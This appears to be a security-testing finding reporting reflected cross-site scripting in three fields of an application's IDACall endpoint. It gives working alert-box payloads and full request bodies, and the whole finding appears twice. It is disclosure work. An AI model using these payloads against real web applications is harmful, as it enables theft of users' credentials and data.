Potential impact:
Perform client-side attacks to the users of the web application. An attacker could inject malicious JavaScript code to steal user credentials, steal sensitive data, perform crypto mining activities and implement a key logger or a XSS worm.
Description:
Stored XSS (also known as persistent) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.
We have detected several user inputs not sanitized properly, hence it makes possible for a potential attacker to execute JavaScript code in user’s browser.
Reflected Cross Site Scripting 1:
These are the details of the injection point:
URL: https://<host>:6443/bimft/isomorphic/IDACall
Field: methodName
Payload: '</TEXTAREA > <img src=x onerror=alert('boehringer')><TEXTAREA>
<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><o
perations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID>isc_builtin</appID><cla
ssName>builtin</className><methodName>'</TEXTAREA
><img src=x onerror=alert('RedTeam')><TEXTAREA></methodName><is_ISC_RPC_D
MI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations></transaction>
Reflected Cross Site Scripting 2:
These are the details of the injection point:
URL: https://<HOST>:6443/bimft/isomorphic/IDACall
Field: appID
Payload: </TEXTAREA > <img src=x onerror=alert('RedTeam')><TEXTAREA>
<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><o
perations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID> </TEXTAREA
><img src=x onerror=alert('RedTeam')><TEXTAREA></appID><className>builtin
</className><methodName>loadFile</methodName><is_ISC_RPC_DMI xsi:type="xsd:boolean">true
</is_ISC_RPC_DMI></elem></operations></transaction>
Reflected Cross Site Scripting 3:
These are the details of the injection point:
URL: https://<HOST>:6443/bimft/isomorphic/IDACall
Field: isc_dd
Payload: ';</script><img+src=""+onerror=alert("RedTeam")><script>var+a='
In all the cases, an Alert pop-up is triggered by exploiting the vulnerability:
Triggering Alert pop-up
See the attachment for the popup trigerred.
Perform client-side attacks to the users of the web application. An attacker could inject malicious JavaScript code to steal user credentials, steal sensitive data, perform crypto mining activities and implement a key logger or a XSS worm.
Description:
Stored XSS (also known as persistent) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.
We have detected several user inputs not sanitized properly, hence it makes possible for a potential attacker to execute JavaScript code in user’s browser.
Reflected Cross Site Scripting 1:
These are the details of the injection point:
URL: https://<host>:6443/bimft/isomorphic/IDACall
Field: methodName
Payload: '</TEXTAREA > <img src=x onerror=alert('boehringer')><TEXTAREA>
<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><o
perations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID>isc_builtin</appID><cla
ssName>builtin</className><methodName>'</TEXTAREA
><img src=x onerror=alert('RedTeam')><TEXTAREA></methodName><is_ISC_RPC_D
MI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations></transaction>
Reflected Cross Site Scripting 2:
These are the details of the injection point:
URL: https://<HOST>:6443/bimft/isomorphic/IDACall
Field: appID
Payload: </TEXTAREA > <img src=x onerror=alert('RedTeam')><TEXTAREA>
<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">3</transactionNum><o
perations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID> </TEXTAREA
><img src=x onerror=alert('RedTeam')><TEXTAREA></appID><className>builtin
</className><methodName>loadFile</methodName><is_ISC_RPC_DMI xsi:type="xsd:boolean">true
</is_ISC_RPC_DMI></elem></operations></transaction>
Reflected Cross Site Scripting 3:
These are the details of the injection point:
URL: https://<HOST>:6443/bimft/isomorphic/IDACall
Field: isc_dd
Payload: ';</script><img+src=""+onerror=alert("RedTeam")><script>var+a='
In all the cases, an Alert pop-up is triggered by exploiting the vulnerability:
Triggering Alert pop-up
See the attachment for the popup trigerred.
Comment